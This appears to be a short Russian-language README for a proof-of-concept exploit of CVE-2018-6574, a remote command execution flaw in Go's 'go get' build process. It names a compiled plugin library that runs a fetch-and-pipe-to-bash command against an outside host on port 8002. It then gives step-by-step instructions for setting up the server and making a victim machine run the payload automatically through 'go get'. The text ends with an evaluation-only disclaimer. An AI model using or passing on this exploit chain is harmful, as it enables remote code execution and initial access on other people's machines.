
Go до версии 1.8.7, Go 1.9.x до версии 1.9.4 и предварительные версии Go 1.10 до Go 1.10rc2 позволяют выполнять удалённые команды через go get во время сборки исходного кода, используя возможность плагинов gcc или clang, поскольку аргументы -fplugin= и -plugin= не блокировались. (из mitre)
Команда была скомпилирована в динамическую библиотеку calc_darwin.so. Текущая команда — curl newton.cycarrier:8002 | /bin/bash. Она использовалась для первоначального доступа к программе. Вам необходимо разместить файловый сервер на порту 8002 и привязать хост к вашему IP-адресу.
Сначала необходимо установить требуемую версию golang на машине жертвы. Затем разместите этот репозиторий на доступном git-сервере. Наконец, используйте команду go get для получения этого репозитория, и команда выполнится автоматически.
Возьмём мой репозиторий в качестве примера. Вам нужно использовать следующую команду:
go get github.com/frozenkp/CVE-2018-6574
Этот репозиторий предназначен только для целей оценки.